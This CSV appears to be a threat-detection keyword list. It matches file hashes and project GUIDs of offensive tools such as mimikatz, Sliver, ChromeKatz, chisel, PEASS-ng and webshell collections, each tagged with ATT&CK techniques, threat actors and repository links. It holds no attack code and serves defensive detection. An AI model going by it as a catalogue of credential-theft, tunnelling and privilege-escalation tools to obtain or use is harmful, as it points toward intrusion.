"*922d41ca55d3fa150f1c8fdc1f030e2acf6c24fcbd0ce1cd1021aeffe29bf24c*",".{0,1000}922d41ca55d3fa150f1c8fdc1f030e2acf6c24fcbd0ce1cd1021aeffe29bf24c.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","31169"
"*922eba3a1f3bf78db513cac0ab1d959ec27bc1879794b8eead2fe6e346be060f*",".{0,1000}922eba3a1f3bf78db513cac0ab1d959ec27bc1879794b8eead2fe6e346be060f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31170"
"*923195967668d70c92c62877cb79a93afecc4eb5144ce6609503123617d55bf3*",".{0,1000}923195967668d70c92c62877cb79a93afecc4eb5144ce6609503123617d55bf3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31171"
"*923ccf5c01669104ef312be3e2cf03ebe3df240a45157ad77d23ecbfa6bc0ceb*",".{0,1000}923ccf5c01669104ef312be3e2cf03ebe3df240a45157ad77d23ecbfa6bc0ceb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31172"
"*924b6dd931df29e29d17c91a5097a040661e17d6a8b404a1d0ee6ad9b0a97473*",".{0,1000}924b6dd931df29e29d17c91a5097a040661e17d6a8b404a1d0ee6ad9b0a97473.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31175"
"*924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e*",".{0,1000}924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31176"
"*9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c*",".{0,1000}9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31177"
"*925365b64eb63bafba4fb5c44494428026d98c1a71fc4b54d638c4c22c6e26a7*",".{0,1000}925365b64eb63bafba4fb5c44494428026d98c1a71fc4b54d638c4c22c6e26a7.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31178"
"*92576b05b8f8f5ed4571e1e165fff1ea271b626cad0f6f71e995d24a1fa427b5*",".{0,1000}92576b05b8f8f5ed4571e1e165fff1ea271b626cad0f6f71e995d24a1fa427b5.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31179"
"*925c2a5e0070046e8fa0152782f4fa43f042f4364597239c414490a4b25f3811*",".{0,1000}925c2a5e0070046e8fa0152782f4fa43f042f4364597239c414490a4b25f3811.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31180"
"*925fe97c66e61207fec6e73bf01385139ccf6a482c234cb63f1bfafa6b260cb7*",".{0,1000}925fe97c66e61207fec6e73bf01385139ccf6a482c234cb63f1bfafa6b260cb7.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","31181"
"*926f9e1e0aacf754734b62556cc9a94961a0f90710b7ebb0b80d71484292d928*",".{0,1000}926f9e1e0aacf754734b62556cc9a94961a0f90710b7ebb0b80d71484292d928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31184"
"*9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8*",".{0,1000}9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31186"
"*927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60*",".{0,1000}927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","31187"
"*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31188"
"*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","31189"
"*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31190"
"*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*",".{0,1000}928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","31191"
"*9280bca757757d39ae4f71993d27f64952fc1a5dcf73c542cb9d1350b8f22049*",".{0,1000}9280bca757757d39ae4f71993d27f64952fc1a5dcf73c542cb9d1350b8f22049.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31192"
"*928120DC-5275-4806-B99B-12D67B710DC0*",".{0,1000}928120DC\-5275\-4806\-B99B\-12D67B710DC0.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#GUIDproject","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","31193"
"*9283d98179addb3f66170f7ac17111f1c91015b421f3e42416cd3b94894ca6ca*",".{0,1000}9283d98179addb3f66170f7ac17111f1c91015b421f3e42416cd3b94894ca6ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31194"
"*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31195"
"*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31196"
"*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31197"
"*92957b4a275c9aeb0579dbd5ce0fa2997de8cf1a3952b540089ef3b1c0729aaf*",".{0,1000}92957b4a275c9aeb0579dbd5ce0fa2997de8cf1a3952b540089ef3b1c0729aaf.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","31200"
"*9295fa0ab820c08fcab5107558f6d7ad390ec6b4a8112d82e11a51dea28c1862*",".{0,1000}9295fa0ab820c08fcab5107558f6d7ad390ec6b4a8112d82e11a51dea28c1862.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/MmNmZTNkNjgzMTNkNDdlNDczYWUxNDhiMGYxM2UzMjc6MTcyNDUyMDIwNg==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31201"
"*9296e9e6240ac6f0af968a479f0d4ca8d71a6fa8850797a5b1600145fe93baec*",".{0,1000}9296e9e6240ac6f0af968a479f0d4ca8d71a6fa8850797a5b1600145fe93baec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31202"
"*929ca5f7728d5b18bdb5fae5862b9ad565e1aab9fe38c416760caf2b6867eefd*",".{0,1000}929ca5f7728d5b18bdb5fae5862b9ad565e1aab9fe38c416760caf2b6867eefd.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","31204"
"*929cc2194f0dff4b6b8e7102e841253dfbdca6790f45e0f1165fbdbeeffc390a*",".{0,1000}929cc2194f0dff4b6b8e7102e841253dfbdca6790f45e0f1165fbdbeeffc390a.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","31205"
"*929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155*",".{0,1000}929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","31206"
"*92ae97557e18ca810999fc05c18e3c6c75476444*",".{0,1000}92ae97557e18ca810999fc05c18e3c6c75476444.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","31210"
"*92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9*",".{0,1000}92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#filehash","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","31212"
"*92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3*",".{0,1000}92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31215"
"*92C5208E-DE76-49F9-B022-1A558C95B6DF*",".{0,1000}92C5208E\-DE76\-49F9\-B022\-1A558C95B6DF.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31216"
"*92c92547aac24ad94bb31551d0d8625c7e30c6b9e88ff542f2a87d9dcd4b08f5*",".{0,1000}92c92547aac24ad94bb31551d0d8625c7e30c6b9e88ff542f2a87d9dcd4b08f5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31218"
"*92cc7e1364616744e3d3c5d0cfede29516c30da1aeeb5ce95329917814b331af*",".{0,1000}92cc7e1364616744e3d3c5d0cfede29516c30da1aeeb5ce95329917814b331af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31220"
"*92d262037522935fde4039ff17bdc6648c294519417e605477d78a9f0e84f20a*",".{0,1000}92d262037522935fde4039ff17bdc6648c294519417e605477d78a9f0e84f20a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","31223"
"*92d8a70870f02f8bb284a317c9801cc774dfabc2660efea327049289f5137376*",".{0,1000}92d8a70870f02f8bb284a317c9801cc774dfabc2660efea327049289f5137376.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31224"
"*92e355ef8f0242891884e4bc51d2422852fdb08430c36a7a9f8f384bfaf975d9*",".{0,1000}92e355ef8f0242891884e4bc51d2422852fdb08430c36a7a9f8f384bfaf975d9.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31228"
"*92ecee084ef8dd59561826895fd8aef0e5db918ad05940aabba3999be223ba4f*",".{0,1000}92ecee084ef8dd59561826895fd8aef0e5db918ad05940aabba3999be223ba4f.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31230"
"*92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c*",".{0,1000}92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31231"
"*92f93bcce51a5c4362dc6304cf01838f47bb274737bfd81e64e4aeb9c4eda895*",".{0,1000}92f93bcce51a5c4362dc6304cf01838f47bb274737bfd81e64e4aeb9c4eda895.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31234"
"*9302e09f9f1856391bc218c2b7cdd898e8934f18efc31dd9b27f52b0e2d1812c*",".{0,1000}9302e09f9f1856391bc218c2b7cdd898e8934f18efc31dd9b27f52b0e2d1812c.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","31236"
"*93052e4a139b6f66aed0be356b47c2816bf121445df85ca5369d024fc06c6f5f*",".{0,1000}93052e4a139b6f66aed0be356b47c2816bf121445df85ca5369d024fc06c6f5f.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","31238"
"*9306e6c0e310b8146db022c3387eb9bb6076a13fb73e45ae98927b3dfb43872b*",".{0,1000}9306e6c0e310b8146db022c3387eb9bb6076a13fb73e45ae98927b3dfb43872b.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","31239"
"*932450a89ef9c5b089ddfb917b49e1e8cd3e001133081f0baedffaf0039f004b*",".{0,1000}932450a89ef9c5b089ddfb917b49e1e8cd3e001133081f0baedffaf0039f004b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31242"
"*932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e*",".{0,1000}932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31246"
